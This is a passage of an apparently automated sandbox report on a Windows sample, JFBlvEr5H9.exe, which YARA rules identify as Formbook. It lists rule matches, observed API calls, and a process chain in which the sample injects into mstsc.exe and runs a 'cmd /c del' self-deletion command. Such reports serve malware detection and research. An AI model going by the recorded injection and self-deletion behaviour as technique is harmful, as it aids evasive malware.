          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007081B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_00708260 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007082E0 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_00708390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_007082AC NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_01080418
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_01082630
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_01080408
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_01080013
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_01080040
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EC27C
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EEC48
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_010EEC58
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B6C0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B8B1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B963
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B493
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B496
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041C539
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402D89
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041CE85
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041BF12
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041C795
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B6C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B820A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B81D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B822AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B82B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B8B1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B954
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F8C4B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F8C50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B493
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B496
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070C539
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2D89
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070CE85
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070BF12
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_006F2FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070C795
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04ABB150 appears 35 times
          Source: JFBlvEr5H9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: JFBlvEr5H9.exe, 00000000.00000002.259012000.0000000002AC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.257828156.000000000064A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.275089237.0000000006FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000000.256995077.0000000000B7A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.357592649.0000000003783000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.356712545.00000000018CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exeBinary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@6/3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01
          Source: JFBlvEr5H9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: JFBlvEr5H9.exeVirustotal: Detection: 20%
          Source: JFBlvEr5H9.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: JFBlvEr5H9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: JFBlvEr5H9.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: JFBlvEr5H9.exeStatic file information: File size 1336832 > 1048576
          Source: JFBlvEr5H9.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x107000
          Source: JFBlvEr5H9.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C9C6 push es; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; retf 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C976 push es; retn 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; iretd
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; retf
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B673 push es; retf 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054C836 push es; retf
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 0_2_0054B6C0 push es; iretd
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00415FC5 push ebp; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C836 push es; retf
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C9C6 push es; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; retf 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; ret
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; retn 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; iretd
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; retf
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; retf 0001h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B6C0 push es; iretd
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B3FB push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.91186053545
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
